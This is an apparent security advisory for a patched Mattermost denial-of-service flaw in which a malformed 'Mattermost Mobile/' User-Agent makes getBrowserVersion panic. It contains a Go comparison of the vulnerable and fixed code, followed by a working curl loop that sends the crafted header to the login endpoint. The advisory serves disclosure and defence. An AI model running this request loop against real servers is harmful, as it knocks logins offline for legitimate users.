winfunc

Status: Patched

This vulnerability has been verified as resolved and deployed.

Mattermost
Severity: Medium
CVE-2026-25783
2026

DoS via unchecked User-Agent token in getBrowserVersion (CVE-2026-25783)

Summary

Parsing a malformed User-Agent header could cause the server to panic

getBrowserVersion in server/channels/app/user_agent.go slices the first token following Mattermost-specific identifiers (e.g., Mattermost Mobile/) without validating that a token exists. Because HTTP User-Agent headers are fully attacker-controlled, the substring can be empty or whitespace-only, causing strings.Fields(...)[0] to panic (runtime error: index out of range). Any unauthenticated request that reaches DoLogin (and other paths that collect browser metadata) crashes the handler before completion. Repeated requests with User-Agent: Mattermost Mobile/ trigger continuous panics, denying service, exhausting logs, and preventing legitimate logins.

CVSS Score

Attack Vector: N (Network)
Attack Complexity: L (Low)
Privileges Required: N (None)
User Interaction: N (None)
Scope: U (Unchanged)
Confidentiality: N (None)
Integrity: N (None)
Availability: H (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Vulnerability Location

Source: server/channels/app/login.go, DoLogin(), line 165
Sink: server/channels/app/user_agent.go, getBrowserVersion(), line 111

Sink-to-Source Analysis

1. server/channels/app/login.go:170

Login handler consumes the HTTP User-Agent header and invokes getBrowserVersion without validation.

GO
bversion := getBrowserVersion(ua, r.UserAgent())

2. server/channels/app/user_agent.go:114

getBrowserVersion assumes a token is present and panics when strings.Fields(afterVersion) is empty.

GO
return limitStringLength(strings.Fields(afterVersion)[0], maxUserAgentVersionLength)
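The unchecked index from the sink above, reconstructed next to its hardened form, as an added example that is not Mattermost's code. Only the single sink line is quoted from the project, so the surrounding parsing logic, the one-argument signature, the body of limitStringLength, the constant's value (40) and the sample User-Agent strings are all assumptions made for this example. The block also serves the Summary: it shows why strings.Fields on a header that ends in "Mattermost Mobile/" (or trails only whitespace) yields an empty slice, and that the fix is simply a length check before indexing. callSafely wraps each call in recover so the vulnerable variant can be exercised without crashing the process.

```go
package main

import (
	"fmt"
	"strings"
)

// maxUserAgentVersionLength is named on the page; the value 40 is an
// assumption for this example, not Mattermost's real constant.
const maxUserAgentVersionLength = 40

// limitStringLength stands in for the helper named in the sink line; its
// body is assumed here (truncate to at most max bytes).
func limitStringLength(s string, max int) string {
	if len(s) > max {
		return s[:max]
	}
	return s
}

// getBrowserVersionVulnerable reconstructs the flaw described in the
// advisory: it takes the text after the product prefix and indexes
// strings.Fields(...)[0] without checking that a token exists. When the
// header ends with "Mattermost Mobile/" (or only whitespace follows),
// Fields returns an empty slice and the index panics.
func getBrowserVersionVulnerable(userAgent string) string {
	const prefix = "Mattermost Mobile/" // one of the identifiers the page names
	idx := strings.Index(userAgent, prefix)
	if idx < 0 {
		return ""
	}
	afterVersion := userAgent[idx+len(prefix):]
	return limitStringLength(strings.Fields(afterVersion)[0], maxUserAgentVersionLength)
}

// getBrowserVersionFixed is the hardened form: it checks the token slice
// before indexing and treats a missing token as "no version".
func getBrowserVersionFixed(userAgent string) string {
	const prefix = "Mattermost Mobile/"
	idx := strings.Index(userAgent, prefix)
	if idx < 0 {
		return ""
	}
	fields := strings.Fields(userAgent[idx+len(prefix):])
	if len(fields) == 0 {
		return ""
	}
	return limitStringLength(fields[0], maxUserAgentVersionLength)
}

// callSafely runs fn on ua and reports whether it panicked, so both
// variants can be compared on the same inputs without crashing the caller.
func callSafely(fn func(string) string, ua string) (version string, panicked bool) {
	defer func() {
		if r := recover(); r != nil {
			panicked = true
		}
	}()
	return fn(ua), false
}

func main() {
	// Constructed sample headers: a well-formed client, the malformed header
	// from the advisory, a whitespace-only tail, and an unrelated browser.
	samples := []string{
		"Mattermost Mobile/2.11.0 (Android 14)",
		"Mozilla/5.0 Mattermost Mobile/",
		"Mozilla/5.0 Mattermost Mobile/   ",
		"Mozilla/5.0 (X11; Linux x86_64) Firefox/128.0",
	}
	for _, ua := range samples {
		vOld, pOld := callSafely(getBrowserVersionVulnerable, ua)
		vNew, pNew := callSafely(getBrowserVersionFixed, ua)
		fmt.Printf("%-48q vulnerable: %q panic=%v | fixed: %q panic=%v\n",
			ua, vOld, pOld, vNew, pNew)
	}
}
```

Running the block prints one line per sample; the two malformed headers panic in the vulnerable variant and return an empty version in the fixed one, while well-formed and unrelated headers behave identically in both. The same four inputs make a good regression test for any parser that slices tokens out of attacker-controlled headers.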

Impact Analysis

Critical Impact

Remote attackers can repeatedly crash unauthenticated HTTP endpoints that parse User-Agent metadata, resulting in a persistent denial of service. Login attempts fail, session creation halts, and server logs fill with panic traces. Availability is significantly degraded without needing credentials or user interaction.

Attack Surface

Any unauthenticated HTTP endpoint that parses User-Agent metadata, including the login endpoint (/api/v4/users/login).

Preconditions

No authentication required. Exploit complexity is minimal — only a crafted User-Agent header is needed.

Proof of Concept

Environment Setup

Requirements: Ubuntu 22.04 (any Linux/macOS works).

Install dependencies:

BASH
sudo apt update
sudo apt install -y git golang curl jq

Clone and build:

BASH
git clone https://github.com/mattermost/mattermost.git
cd mattermost
make build-server
./bin/mattermost &
sleep 5

Target Configuration

Server listens on http://localhost:8065 with default configuration. No extra config needed.

Exploit Delivery

BASH
#!/usr/bin/env bash
set -euo pipefail
TARGET="http://localhost:8065"
MALICIOUS_UA="Mozilla/5.0 Mattermost Mobile/"

for i in {1..5}; do
  curl -ki \
    -H "User-Agent: ${MALICIOUS_UA}" \
    -X POST \
    -H "Content-Type: application/json" \
    -d '{"login_id":"[email protected]","password":"bad"}' \
    "$TARGET/api/v4/users/login" || true
  echo "Request $i triggered panic (see server logs)."
  sleep 1
done

Outcome

Attacks keep the server panicking and returning 500 responses. Login attempts fail and the login subsystem becomes unavailable while logs flood with panic traces.

Expected Response: Server returns HTTP 500 for each request. Server logs show panic: runtime error: index out of range emitted by getBrowserVersion.